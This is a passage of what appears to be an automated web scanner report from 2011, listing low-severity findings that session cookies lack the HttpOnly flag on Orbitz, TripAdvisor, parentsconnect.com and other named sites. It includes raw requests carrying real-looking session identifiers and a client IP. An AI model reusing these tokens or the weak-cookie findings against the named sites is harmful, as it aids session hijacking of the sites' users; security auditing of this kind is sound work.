Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.178. http://www.orbitz.com/hotels/United_States--FL/Miami/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--FL/Miami/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=33E8004D61285916135D5168A58C0149; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:22 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--FL/Miami/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.179. http://www.orbitz.com/hotels/United_States--FL/Orlando/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--FL/Orlando/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=531639EA775BCB0F57839684FE740F16; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:18 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--FL/Orlando/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.180. http://www.orbitz.com/hotels/United_States--IL/Chicago/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--IL/Chicago/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=7772DAA91090BC9F1B85EAC0BFE8002C; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:56 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--IL/Chicago/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.181. http://www.orbitz.com/hotels/United_States--NV/Las_Vegas/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--NV/Las_Vegas/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=7A92F5F73440CFC82F9CDCCCE0E333AA; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:11 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--NV/Las_Vegas/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.182. http://www.orbitz.com/hotels/United_States--NY/New_York/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--NY/New_York/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=F3E51A36EFA6771EA083391BE90BF2E0; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:36 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--NY/New_York/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.183. http://www.orbitz.com/trips/writeReview previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/trips/writeReview

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=EDF049DE74A33B35AB07FBCDFE48CCA3; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trips/writeReview?popupsDisabled=true HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EDF049DE74A33B35AB07FBCDFE48CCA3; Path=/
Location: https://www.orbitz.com/trips/writeReview?popupsDisabled=true
Content-Length: 0
Date: Wed, 02 Feb 2011 16:06:14 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

12.184. https://www.orbitz.com/account/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.orbitz.com
Path:	/account/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=026995801E92D176318AD90FEB65F6DB; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:31 GMT; Path=/
NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.185. https://www.orbitz.com/account/registration previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.orbitz.com
Path:	/account/registration

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=A7D6B6C6B73BC640D7493A94555D7334; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:35 GMT; Path=/
NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.186. https://www.orbitz.com/trips/writeReview previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.orbitz.com
Path:	/trips/writeReview

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=B15415278A3C667686225B11283FD050; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:39 GMT; Path=/
NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.187. http://www.parentsconnect.com/flux/login_sync.jhtml previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.parentsconnect.com
Path:	/flux/login_sync.jhtml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=3504E23633DB45B3563F6DBC8EC7D783.kids-jboss-077-811-mtvi-com-35852; Path=/
app-instance=relaunch-parentsconnect-com-1-kids-jboss-077; Path=/
MTV_ID=24.143.206.111.1296674852892; Domain=.parentsconnect.com; Expires=Sat, 30-Jan-2021 19:27:32 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /flux/login_sync.jhtml HTTP/1.1
Host: www.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.188. http://www.parentsconnect.com/flux/widgetRedirect.jhtml previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.parentsconnect.com
Path:	/flux/widgetRedirect.jhtml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=C1BE031A933DD422F9C84022E01396EA.kids-jboss-078-811-mtvi-com-35852; Path=/
app-instance=relaunch-parentsconnect-com-1-kids-jboss-078; Path=/
MTV_ID=24.143.206.111.1296674850611; Domain=.parentsconnect.com; Expires=Sat, 30-Jan-2021 19:27:30 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /flux/widgetRedirect.jhtml HTTP/1.1
Host: www.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.189. http://www.pctools.com/free-antivirus/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pctools.com
Path:	/free-antivirus/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=771d08fef2eb643a0448e203f42a969f; expires=Thu, 03 Feb 2011 08:00:19 GMT; path=/; domain=pctools.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /free-antivirus/ HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.190. http://www.ratedesi.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ratedesi.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=odm00hplmonq2l4mff2kcmq426; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ratedesi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.191. http://www.ratestogo.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ratestogo.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCCCQTTTR=EJHDHHOAFENFKDLJMBLPCAFD; path=/
%7CSearchEng%7C=%7C%7C%7C%7C2011%2D2%2D4%7C2011%2D2%2D5%7C; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ratestogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:17:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 36648
Content-Type: text/html; Charset=windows-1252
Expires: Tue, 01 Feb 2011 16:17:04 GMT
Set-Cookie: %7CSearchEng%7C=%7C%7C%7C%7C2011%2D2%2D4%7C2011%2D2%2D5%7C; path=/
Set-Cookie: ASPSESSIONIDCCCQTTTR=EJHDHHOAFENFKDLJMBLPCAFD; path=/
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equiv
...[SNIP]...

12.192. http://www.thespanner.co.uk/2009/03/25/xss-rays/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.thespanner.co.uk
Path:	/2009/03/25/xss-rays/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=a6db978e640c10620c4d7266a630648f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2009/03/25/xss-rays/ HTTP/1.1
Host: www.thespanner.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://www.thespanner.co.uk/?p=378>; rel=shortlink
Pragma: no-cache
X-Pingback: http://www.thespanner.co.uk/xmlrpc.php
X-Powered-By: PHP/4.4.9
Set-Cookie: PHPSESSID=a6db978e640c10620c4d7266a630648f; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head profile
...[SNIP]...

12.193. http://www.thespanner.co.uk/feed/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.thespanner.co.uk
Path:	/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=30d99f83d276fec46ee4ae51e26c3ad8; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/ HTTP/1.1
Host: www.thespanner.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "6c51f36d9d91eddf89ad7e385f7489b4"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Pingback: http://www.thespanner.co.uk/xmlrpc.php
X-Powered-By: PHP/4.4.9
Set-Cookie: PHPSESSID=30d99f83d276fec46ee4ae51e26c3ad8; path=/
Last-Modified: Wed, 26 Jan 2011 12:40:05 GMT
Connection: close
Content-Type: text/xml; charset=UTF-8
Content-Length: 40187

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

12.194. http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tripadvisor.com
Path:	/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TASession=%1%V2ID.B6476C06D407A2CFBBFE8118B231FB4F*SQ.1*LS.Hotel_Review*GR.51*TCPAR.95*TBR.68*EXEX.79*ABTR.3*PPRP.62*PHTB.11*FS.65*HS.popularity*ES.popularity*AS.popularity*DS.5*CU.USD*TFT.3*DF.0*FP.%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts%5C.html*LP.%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts%5C.html*MS.7*TRA.true*LL.1826400*LD.114150*EWS.Hotel_Review; Domain=.tripadvisor.com; Path=/
v1st=32DEE8430F77FBAD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tripadvisor.com
